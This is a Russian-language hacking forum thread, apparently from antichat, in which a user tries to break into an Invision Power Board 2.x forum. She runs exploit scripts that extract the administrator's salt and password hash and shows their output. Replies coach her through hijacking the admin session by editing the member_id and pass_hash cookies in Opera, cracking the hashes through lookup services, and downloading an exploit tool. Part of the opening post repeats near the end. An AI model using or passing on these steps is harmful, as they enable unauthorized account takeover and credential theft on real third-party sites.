Народ как-то решила взломать форум... Версия форума не указана поняла по внешности что это ipb 2 ... Дальше по примерчику:

C:\>ipb2.pl [тут адрес форума] /forum/ 6
[~] SERVER : [тут адрес форума]
[~] PATH : /forum/
[~] MEMBER ID : 6
[~] VALUE TO STEAL :
[~] SEARCHING THE EASIEST WAY... [ FAILED ]
[~] SEARCHING THE SALT [\5][ DONE ]

SALT : 8275753649

[~] SEARCHING THE PASS HASH |32][ DONE ]

PASS HASH : 98564855539910110251564957545053102565010054565752 49504898491025152102

кажится все нормуль но не может же быть такая соль??? и сам хешь... =( Вообщем дальше как по инструкции делаю словарь с солью потом подбираю пароль но не находит=( Хотя я точно знаю какой пароль в словаре он есть... из-за чего это?

Так же воспользовалась другим примерчиком нашла куки админа

C:\>2.pl [тут адрес форума] /forum/ 6 1
[~] SERVER : [тут адрес форума]
[~] PATH : /forum/
[~] MEMBER ID : 6
[~] TARGET : 0 - IPB 2.*
[~] SEARCHING PASSWORD ... [ DONE ]

MEMBER ID : 6
PASSWORD : 23c1674c36fdca629ef6d91b155e5614

но почему то при замене не хочет входить под ником админа!? если другого пользователя куки вставляю то входит нормально а под админом не хочет входить из-за чего???

первый сплойт пример которого ты привела с ошибкой.
а со вторым... если всё правильно заменяешь, и id и hash то должна под админом войти, но в админку так не попасть

а есть первый сплойт без ошибки!?

А теперь на счет кук... Вот например возьмем куки форума в котором я должна поменять id и hash - юля@www.ser.ru[2]

содержимого этого файла:

member_id
5771 [ - это мой id]
www.ser.ru/
1536
1119480320
29822330
3360966416
29748904
*
pass_hash
c6c6b5495cc11cf46b9c44accbb6c721 [ - это мой hush]
www.ser.ru/
1536
1119480320
29822330
3360966416
29748904
*
мне надо поменять id (вместо 5771 на 6)
и
hush ( c6c6b5495cc11cf46b9c44accbb6c721 на 23c1674c36fdca629ef6d91b155e5614)

получаю:

member_id
6
www.sergeylazarev.ru/
1536
1119480320
29822330
3360966416
29748904
*
pass_hash
23c1674c36fdca629ef6d91b155e5614
www.sergeylazarev.ru/
1536
1119480320
29822330
3360966416
29748904
*

правильно сделала??? захожу снова на форум но почему то куки старые грузятся или вообще не входит типа не зарегина я.... правда у меня Explorer может другой брауз нужно??? да мне админка не очень нужна просто хочу этот способ до конца разобрать...

P.S. Может есть еще способы взлома ipb 2.x ???

Если в админку тебе не надо, а просто помодерировать хочешь-))))) Короче забей на эту фигню, как ты меняешь! Так конечно тоже можно, но лучше установи себе браузер Opera там зайди в Tools => Cookies там выберишь сайт на котором куки надо поменять и сразу увидишь разницу насколько так всё легче! Там просто уже не запутаешься...
Зайдёшь под своим ником потом отредактируешь куки перезагрузишь страницу и ты под админом, если его куки... вот. А вообще вроде и так всё верно.

В Опере намного удобнее куки редактировать. Регистрируешься на форуме (если ты там ещё не зарегена), затем правишь параметры member_id и pass_hash на полученные эксплойтом. обновляешь страницу форума и всё...

Только для доступа в Админку тебе надо пасс по-любому, расшифровывай pass_hash с помощью MD5inside или отправляй на спецсервак по расшифровке пассов из хешей.

W. W. она ломает форум IPB 2.* а там хэш так просто не расшифруешь! Поэтому MD5inside отпадает сразу. Ну только, если она соль не знает.....

Ой, да... ну прямой подбор отпадает.

Хотя бы помодерить так можно :Р

Есть эксплойт специально под 2.* версию который тащит соль и хэш. Видео на счет этой баги есть в разделе video.antichat.net . Там с видео и удобная прожка идет.

Есть эксплойт специально под 2.* версию который тащит соль и хэш. Видео на счет этой баги есть в разделе video.antichat.net . Там с видео и удобная прожка идет.

http://video.antichat.net/videos/coyl/ipb2.rar
Если я не ошибаюсь

Юличка лазарева сайт решила поломать?)))
а ваще ребята правы юзай Оперу может быть у тя глюки из за ИЕ..
Барсик да сцылка та)

Народ как-то решила взломать форум... Версия форума не указана поняла по внешности что это ipb 2 ... Дальше по примерчику:

C:\>ipb2.pl [тут адрес форума] /forum/ 6
[~] SERVER : [тут адрес форума]
[~] PATH : /forum/
[~] MEMBER ID : 6
[~] VALUE TO STEAL :
[~] SEARCHING THE EASIEST WAY... [ FAILED ]
[~] SEARCHING THE SALT [\5][ DONE ]

SALT : 8275753649

[~] SEARCHING THE PASS HASH |32][ DONE ]

PASS HASH : 98564855539910110251564957545053102565010054565752 49504898491025152102

кажится все нормуль но не может же быть такая соль??? и сам хешь... =( Вообщем дальше как по инструкции делаю словарь с солью потом подбираю пароль но не находит=( Хотя я точно знаю какой пароль в словаре он есть... из-за чего это?

Вообще-то это и есть тот сплойт, который соль вытягивает и хэш. Так что ссылки на этот же самый сплойт неуместны, т.к. она всё и делала как в видео, она ж грит:"Вообщем дальше как по инструкции".=))))
И тем более, что сплойт, который в архиае с видео он с ошибкой, так что ей не поможет.